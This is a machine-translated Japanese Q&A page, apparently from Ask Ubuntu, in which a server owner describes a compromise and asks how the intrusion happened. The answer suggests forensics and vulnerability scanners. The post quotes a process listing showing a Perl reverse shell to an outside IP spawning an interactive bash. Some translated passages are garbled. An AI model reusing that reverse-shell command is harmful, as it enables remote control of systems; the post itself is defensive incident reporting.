Ubuntu サービスの脆弱性を見つけるにはどうすればいいですか?

tag-icon tag-icon linux ubuntu security trojan
Ubuntu サービスの脆弱性を見つけるにはどうすればいいですか?

Ubuntu サーバーを実行しています。今日、Amazon の不正使用レポートにより、サーバーがハッキングされ、DDoS 攻撃に使用されていることがわかりました。

サーバー上で以下のものを発見しました。

サーバー上に以下の疑わしいファイルがありました。

-rw-r--r-- 1 www-data www-data      759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data  1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data        5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data  1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data        5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data      119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data       73 Feb  1 01:01 conf.n

次のプロセスが実行されていました

www-data  8292 10629  0 Jan28 ?        00:00:00 perl /tmp/weiwei.pl 222.186.42.207 5222
www-data  8293  8292  0 Jan28 ?        00:00:00 /bin/bash -i
www-data  8293  8292  0 Jan28 ?        00:00:00 ./huizhen

実行するとファイルはclamav削除されましたが、プロセスはまだ実行されていたため、手動で強制終了しました。/tmp/huizhen/tmp/sishenweiwei.pl./huizhen

サーバー上で次のサービスが実行されています。

  • SSH - デフォルトのポート22は使用せず、キー認証のみ
  • MongoDB - 特定のセキュリティ グループに対してポートが開かれています
  • Memcache - 特定のセキュリティ グループに対してポートが開かれています
  • NodeJS - 特定のセキュリティ グループに対してポートが開かれています
  • Tomcat - 8080/8443 ポートは axis2 ウェブサービスと solr 用に公開されています

私の推測では、プロセスは tomcat と同じユーザー グループを使用して実行されているため、ハッカーは tomcat/axis2/solr の脆弱性を介して侵入したと考えられます。

今のところ8080/8443ポートをブロックし、サーバーを新しいものに置き換える予定です。Tomcatはnginxを介して別のサーバーからアクセスできるようになります。また、セキュリティパッチをインストールしました。無人アップグレード

問題は、ハッカーがどうやって侵入し、トロイの木馬を仕掛けたのかをどうやって見つけるかです。セキュリティを強化するために他にどのような対策を講じればよいでしょうか。

答え1

これは非常に妥当な質問です。厳密に言えば、この質問に答えるには、システムをフリーズして法医学的検査を行うのが最善策でしょう。ウイルス除去など、その後の介入によって、侵入者が残した痕跡は変更され、場合によっては完全に消去されてしまいます。

この道がもう開かれていないことを考えると、最も良いのは脆弱性スキャナ、プログラムを使用することですつまりインストールのストレステストのために設計されています。非常に多くの用語がありますが、Googleで検索するだけでもかまいませんVulnerability Scannerが、最もよく知られているのはネッススさまざまなライセンスを持つ無料版から有料版まで、いくつかのバージョンがあり、かなり高額になる可能性があり、支払ってもよいと思う金額よりも高額になる可能性があります。

ただし、無料版もあり、プリインストールされています。カリリナックス完全に無料ですが、登録する必要があります。私たちの多くは、Kali をラップトップの VM にインストールし、自宅の外からストレス テストを実行して、インターネットに接続されたサーバーで実行されているアプリケーションに残っている欠陥 (ほとんどの場合、パッチが適用されていない既知の脆弱性) を確認します。

インターネット上には、その使用方法を説明するガイドが多数あります。また、ファイアウォールを信頼している場合、独自の LAN 内で試すこともできます。さらに、Kali を VM として実行している場合は、同じ PC 内から試すこともできます。

関連情報